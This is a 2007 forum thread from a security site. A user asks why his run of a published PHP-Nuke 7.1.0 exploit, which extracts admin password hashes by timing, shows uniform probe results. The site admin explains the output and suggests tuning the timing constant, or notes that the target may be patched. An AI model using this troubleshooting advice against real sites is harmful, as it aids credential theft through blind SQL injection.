 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 365
 Members: 0
 Total: 365
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Php nuke 7.1.0 |
|
 Posted: Sun Nov 18, 2007 12:06 am |
 |
|
| lordorion |
| Regular user |
 |
| |
| Joined: Nov 16, 2007 |
| Posts: 6 |
|
|
|
 |
|
 |
|
So I was messing around with waraxe's exploit found here:
http://www.waraxe.us/?modname=sa&id=003.
I ran the script and it gave me an output:
| Code: | pos --> 1char --> 0 --> 46
pos --> 1char --> 1 --> 46
pos --> 1char --> 2 --> 48
pos --> 1char --> 3 --> 68
pos --> 1char --> 4 --> 56
pos --> 1char --> 5 --> 45
pos --> 1char --> 6 --> 46
pos --> 1char --> 7 --> 76
pos --> 1char --> 8 --> 42
pos --> 1char --> 9 --> 83
pos --> 1char --> a --> 94
pos --> 1char --> b --> 45
pos --> 1char --> c --> 45
pos --> 1char --> d --> 46
pos --> 1char --> e --> 43
pos --> 1char --> f --> 50
pos --> 2char --> 0 --> 43
pos --> 2char --> 1 --> 44
pos --> 2char --> 2 --> 55
pos --> 2char --> 3 --> 46
pos --> 2char --> 4 --> 43
...
[truncated by waraxe]
...
----- Final md5hash --> f----- |
I know what I'm supposed to be looking for, but I'm having a bit of trouble understanding what this info means. Anyone wanna point me in the right direction? |
|
|
|
|
|
|
|
|
| Posted: Sun Nov 18, 2007 1:15 am |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
From output:
| Code: |
pos --> 1char --> 0 --> 46
pos --> 1char --> 1 --> 46
pos --> 1char --> 2 --> 48
pos --> 1char --> 3 --> 68
pos --> 1char --> 4 --> 56
pos --> 1char --> 5 --> 45
pos --> 1char --> 6 --> 46
pos --> 1char --> 7 --> 76
pos --> 1char --> 8 --> 42
pos --> 1char --> 9 --> 83
pos --> 1char --> a --> 94
pos --> 1char --> b --> 45
pos --> 1char --> c --> 45
pos --> 1char --> d --> 46
pos --> 1char --> e --> 43
pos --> 1char --> f --> 50
|
As you can see, 16 probes against first hex char in md5 hash gave similar response times. So there is two options:
1. Make "$md5times = 260000;" bigger, for example:
$md5times = 900000;
2. Probably this is patched nuke version. Or sql table prefix differs from default "nuke_". And don't forget, that this exploit comes from feb 2004! It's hard to find working target three and half years after exploit comes public  |
|
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
